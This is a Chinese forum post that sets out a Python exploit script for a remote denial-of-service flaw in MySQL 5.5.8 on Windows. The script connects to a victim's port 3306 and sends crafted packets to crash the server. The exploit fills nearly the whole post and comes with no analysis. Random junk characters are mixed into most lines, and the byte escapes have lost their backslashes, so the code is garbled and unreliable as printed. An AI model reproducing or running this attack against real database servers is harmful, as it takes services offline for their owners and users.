最近看过此主题的会员

返回列表 发帖
MySQL 5.5.8 远程拒绝服务漏洞
import socket, sys5 y; p* c- x; Z& |5 Q
- B. m# ^9 G- ^9 D/ q
print ", T1 D7 o# k$ I& g+ X+ G7 s4 S
": G2 c" Y7 D/ w; ^$ M
print "----------------------------------------------------------------"
7 u1 h- L$ c; n  r% U1 Hprint "| MySQL 5.5.8 Null Ptr (windows)                                |"
2 q5 f8 N: ^: W/ H+ \+ fprint "| Level Smash the Stack                                         |"2 e# M: t2 y6 X# ^) f( o" u2 B
print "----------------------------------------------------------------"$ w5 R% }) \* `) V' ?# b
print "/ z+ Z( f8 u) J4 {! u0 \1 A& t' s
"
0 M& p5 s0 `4 i" }# v ( D4 f, e& ]- K  Q6 f" k% {
buf=("&x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
. z2 J% f: U2 f2 Z# K# B"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
: ?. \; y5 u0 `# N  P) k 9 W7 w; g+ t" \( |) n6 ^- _
buf2=("x11x00x00x00x03set autocommit30")
) |( `% Y; \& o' h( L/ Q . V+ q9 l& I" j5 ~) ^
def usage():
0 Y" H& Z( ]) N& U* R  k: R/ I( rprint "usage : ./mysql.py <victim_ip>"9 Y+ d- ~- k, A8 z* W/ g1 K
print "example: ./mysql.py 192.168.1.22", j' {- J% h4 I. j4 @
7 d0 _; z2 E5 g" S
( r9 ]% ]0 P9 \/ @; b; \/ ?3 c, x
def main():
% N$ d/ r0 N# s& h2 C2 B/ T* iif len(sys.argv) != 2:4 X% X$ U9 ?) ^: X
usage()3 M6 ]0 T# P3 e
sys.exit()
& H4 b$ a0 a" X5 U7 as = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
. g: m) w* g6 t9 b! a. E3 |" D / s$ m7 |. Q8 J
HOST = sys.argv[1]. l1 S. t1 {: \
PORT = int(3306)2 E/ X$ R; X2 J5 m: m$ F4 V& e' P
s.connect((HOST,PORT))
$ f4 C( g' i% p1 Iprint "
  • Connect"6 ~5 I& J* H8 u) i+ v9 Z
    s.send(buf)1 _: `5 G' d1 D7 C" N: G# f; q
    print "
  • Payload 1 sent"
    4 I$ d1 _. Y; F) i5 p! c0 h' Gs.send(buf2)! D  p# O3 V- [
    print "
  • Payload 2 sent  v- ^# K4 g& P. X
    ", "
  • Run again to ensure it is down..
    * Q/ W' `1 B4 H"
    1 q- |! }8 g( `  Hs.close()5 W9 D5 F; i4 A: r- K: A, y

    0 W8 P- b8 x$ f5 c1 V0 ^1 Bif __name__ == "__main__":
    $ o6 V  i. j' d. x) Kmain()
    & L* O  U# C- V' h& ?: t6 r& [
    8 J0 ^; U% T/ Z7 V/ f+ k4 w
    9 W  m$ j( X; c) C* P
    % ]& \+ l4 |. [  _. _; b" g9 Z  S. _# g% K% t

    2 n8 ~3 \3 R; ?/ N" L" l
    9 J; G6 J4 b$ M  x" T9 t
    8 l9 q6 m( n4 x. I0 D/ j- a. E: o8 K0 _, y4 Z4 O$ ?1 q4 P
    ( @/ S) C6 B5 V

    ; d% X% B0 v! s/ \8 j/ [& g6 g
    * y% J9 f* a5 e# Z- r3 b4 K( |0 f) b7 \/ ~2 e  f' G

    " @! ~, X  Q; y& _- h& H. J' e. X* ~$ M) L6 h4 A  A* W

    . j- y7 C, W! F8 a( L$ n; H+ ~$ g2 ?# `4 F+ w: O$ X
    ; l2 n7 G, ~8 I0 [6 C
    9 T$ C( b/ v# ^, J% R8 w$ J
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  •  

    您可能还想看的主题:

    启明星辰招聘

    TOP

    返回列表